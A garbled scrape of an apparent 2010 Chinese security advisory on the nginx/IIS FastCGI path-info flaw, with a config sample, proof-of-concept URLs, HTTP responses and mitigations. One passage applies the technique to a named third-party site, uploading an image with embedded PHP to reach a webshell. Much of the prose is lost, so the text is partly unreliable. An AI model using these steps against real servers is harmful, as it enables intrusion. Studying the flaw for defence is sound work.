Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

fastcgi的安全问题

VIEWS: 1 PAGES: 2

									                                                                                                                 |



fastcgi                                                                                   Readable   Link
            -51CTO                     obnus
                                                                                                     Feed

fastcgi                          - note.txt - 51CTO
                                                                 80sec                         web
                php

http://www.80sec.com/nginx-securit.html

http://www.80sec.com/iis-cgifastcgi-security-hol.html

           nginx           cgi          php

location ~ \.php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
include fastcgi_params;
}

              php         location                              URI                                    Fastcgi
            SCRIPT_FILENAME nginx              $fastcgi_script_name
$fastcgi_script_name          URI                                                                PATH_INFO
       PHP                    cgi.fix_pathinfo                      SCRIPT_FILENAME
                  http://www.80sec.com/80sec.jpg

http://www.80sec.com/80sec.jpg/80sec.php

                URI

/80sec.jpg/80sec.php

    location                                  fastcgi    nginx                  SCRIPT_FILENAME

/scripts/80sec.jpg/80sec.php

           webserver lighttpd                           SCRIPT_FILENAME

/scripts/80sec.jpg


      fastcgi                             fix_pathinfo              SCRIPT_FILENAME
                  fix_pathinfo                    PATH_INFO
Php
SCRIPT_FILENAME            PATH_INFO

/scripts/80sec.jpg 80sec.php

         /scripts/80sec.jpg                                                     nginx    php


POC                nginx         php                               robots.txt           /80sec.php


    http://www.80sec.com/robots.txt

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

         http://www.80sec.com/robots.txt/80sec.php

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6

      Content-Type

           http://www.nginx.org




    cgi.fix_pathinfo 0
if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}

IIS            CGI             PHP                  IIS                             80sec       nginx
                                                          PHP                           Phpinfo     php
                      CGI/FAST-CGI



http://www.80sec.com/robots.txt/1.php

                               HTTP

                            PHP                   asp                                      asp

http://www.80sec.com/some.asp/1.php



       cgi.fix_pathinfo 0



       http://www.baoji360.com/1.jpg



404 Not Found

——————————————————————————–

nginx/0.7.63

web nginx 0.7.63
                                              jpg/jpeg/png/gif                                              100
*100                        ue                                                phpinfo
               jpg                     php
                            100*100                  ue           phpinfo()
                                                                                          ie
         php                                         webshell……….

         http://www.baoji360.com /dat/upload/member_logo/201005/sex.jpg

http://www.baoji360.com/dat/upload/member_logo/201005/sex.jpg/a.php



           superhei                   80vul
                              php                                 txt                   xxxx/xx.txt/a.php
                        txt                                      web


               0

								
To top